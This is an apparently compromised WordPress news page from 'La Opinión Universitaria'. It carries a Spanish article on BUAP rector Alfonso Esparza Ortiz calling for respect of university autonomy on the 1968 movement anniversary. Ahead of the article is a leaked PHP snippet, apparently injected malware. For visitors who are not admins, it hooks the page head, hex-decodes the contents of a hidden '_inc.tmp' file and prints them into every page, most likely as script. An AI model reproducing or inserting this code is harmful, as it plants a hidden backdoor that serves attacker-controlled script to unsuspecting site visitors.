if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Alfonso Esparza Ortiz, igual que en 68, la Buap pide respeto a la autonomía – La Opinión Universitaria La Opinión Universitaria
Menu

Alfonso Esparza Ortiz, igual que en 68, la Buap pide respeto a la autonomía

 

 

  • El rector dice no a la injerencia de agentes externos

 

Por Diego Cuautle

En el marco del 51 aniversario del movimiento estudiantil de 1968 y al reunirse con estudiantes de la Benemérita Universidad Autónoma de Puebla (BUAP), el rector Alfonso Esparza Ortiz reiteré el llamado a respetar la autonomía universitaria y la no injerencia de agentes externos que no conocen la vida de las universidades.

En entrevista, señaló que “no queremos injerencias de estancias externas, de los gobiernos, de gente ajena que no conoce lo que es la universidad, somos una gran institución» y reiteró que no permitirán que los gobiernos intervengan en las decisiones de la institución.

Ante la presencia de estudiantes de distintas carreras que realizaron una marcha de Ciudad Universitaria al Edificio Carolino donde se manifestaron para recordar a los estudiantes caídos aquel 2 de octubre, el rector dijo que “hoy más que nunca los valores del respeto a la autonomía universitaria están más que vigentes”.

“Nosotros somos respetuosos y exigimos respeto en la misma medida. Me uno a esta celebración y seguiremos con otro tipo de eventos dando vida a lo que sucedió hace 52 años y que siga vigente este gran espíritu de libertad de expresión, de libre pensamiento, de libre cátedra. Somos BUAP y seguiremos siendo orgullosamente”, comentó.

AL ser cuestionado sobre lo que se ha dado a conocer en algunos medios de comunicación, Esparza Ortiz lamentó que los ataques están surgiendo con el objetivo de desestabilizar a la BUAP a través de agentes externos que trabajan por encargo.

Recordó que el clima político al interior de la máxima casa de estudios “ha sido complicado, desde febrero, cuando se realizó la elección de consejeros universitarios, la efervescencia subió de tono, desde entonces se notó ya la injerencia de grupos ajenos”.

Subrayó que en la BUAP se seguirá con el espíritu de libertad, de expresión, de libre pensamiento, de libre cátedra y de administración, “somos BUAP y lo seguiremos siendo”.

Finalmente reiteró que a 51 años de distancia, los principios que enarbolaron a los estudiantes en ese entonces, siguen vigentes. “En ese entonces, un reclamo natural de los estudiantes era la autonomía. Hoy más que nunca está presente en todas las universidades”.

 

No comments

Deja una respuesta

Tweets recientes